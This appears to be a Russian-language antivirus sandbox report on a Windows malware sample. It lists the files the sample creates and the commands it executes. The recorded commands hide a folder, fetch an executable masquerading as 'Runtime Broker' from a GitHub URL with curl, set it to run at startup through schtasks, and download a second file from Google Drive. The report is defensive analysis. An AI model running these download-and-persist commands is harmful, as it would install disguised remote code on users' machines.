Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\runtime broker
Изменения в файловой системе
Создает следующие файлы
- nul
- %APPDATA%\microsoft\windows\runtime broker\timer.txt
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c attrib +h +s "%APPDATA%\Microsoft\Windows\Runtime Broker" >NUL 2>NUL
- '<SYSTEM32>\attrib.exe' +h +s "%APPDATA%\Microsoft\Windows\Runtime Broker"
- '<SYSTEM32>\cmd.exe' /c curl -s -o "%APPDATA%\Microsoft\Windows\Runtime Broker\Runtime Broker.exe" -L "https://github.com/shmurkioskull/3huihiwuerh3uibuwdheuhe/raw/main/Test2.exe" >NUL 2>NUL
- '<SYSTEM32>\cmd.exe' /c SCHTASKS /CREATE /TN "Runtime Broker" /TR "%APPDATA%\Microsoft\Windows\Runtime Broker\Runtime Broker.exe" /SC onstart /delay 0000:30 /F >NUL 2>NUL
- '<SYSTEM32>\schtasks.exe' /CREATE /TN "Runtime Broker" /TR "%APPDATA%\Microsoft\Windows\Runtime Broker\Runtime Broker.exe" /SC onstart /delay 0000:30 /F
- '<SYSTEM32>\cmd.exe' /c curl -s -o "%APPDATA%\Microsoft\Windows\Runtime Broker\Command.txt" -L "https://drive.google.com/uc?export=download&id=10PkE9SbsjFg5WEx9Ju2PlpVmfrl6Xqb0" >NUL 2>NUL
